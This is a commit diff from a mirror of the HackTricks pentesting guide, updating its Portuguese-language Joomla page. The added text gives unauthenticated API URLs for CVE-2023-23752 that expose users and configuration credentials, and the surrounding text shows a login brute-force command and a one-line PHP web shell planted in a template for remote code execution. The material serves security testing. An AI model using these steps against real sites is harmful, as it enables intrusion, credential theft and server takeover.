mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 23:20:49 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to p
This commit is contained in:
parent
7546908f14
commit
864f4fa90e
1 changed files with 12 additions and 3 deletions
|
@ -78,9 +78,18 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
|
|||
```bash
|
||||
droopescan scan joomla --url http://joomla-site.local/
|
||||
```
|
||||
### Brute-Force
|
||||
### API Divulgação de Informações Não Autenticadas:
|
||||
As versões de 4.0.0 a 4.2.7 são vulneráveis à divulgação de informações não autenticadas (CVE-2023-23752) que irá expor credenciais e outras informações.
|
||||
|
||||
Você pode usar este [script](https://github.com/ajnik/joomla-bruteforce) para tentar fazer força bruta no login.
|
||||
- Usuários: `http://<host>/api/v1/users?public=true`
|
||||
|
||||
- Arquivo de Configuração: `http://<host>/api/index.php/v1/config/application?public=true`
|
||||
|
||||
**Módulo MSF**: `scanner/http/joomla_api_improper_access_checks` ou script ruby: [51334](https://www.exploit-db.com/exploits/51334)
|
||||
|
||||
### Força Bruta
|
||||
|
||||
Você pode usar este [script](https://github.com/ajnik/joomla-bruteforce) para tentar força bruta no login.
|
||||
```shell-session
|
||||
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
|
||||
|
||||
|
@ -91,7 +100,7 @@ admin:admin
|
|||
Se você conseguiu obter **credenciais de admin**, você pode **RCE dentro dela** adicionando um trecho de **código PHP** para obter **RCE**. Podemos fazer isso **personalizando** um **template**.
|
||||
|
||||
1. **Clique** em **`Templates`** na parte inferior esquerda em `Configuração` para abrir o menu de templates.
|
||||
2. **Clique** em um nome de **template**. Vamos escolher **`protostar`** sob o cabeçalho da coluna `Template`. Isso nos levará à página **`Templates: Customise`**.
|
||||
2. **Clique** em um nome de **template**. Vamos escolher **`protostar`** sob o cabeçalho `Template`. Isso nos levará à página **`Templates: Customise`**.
|
||||
3. Por fim, você pode clicar em uma página para abrir a **fonte da página**. Vamos escolher a página **`error.php`**. Vamos adicionar um **comando PHP de uma linha para obter execução de código** da seguinte forma:
|
||||
1. **`system($_GET['cmd']);`**
|
||||
4. **Salvar e Fechar**
|
||||
|
|
Loading…
Reference in a new issue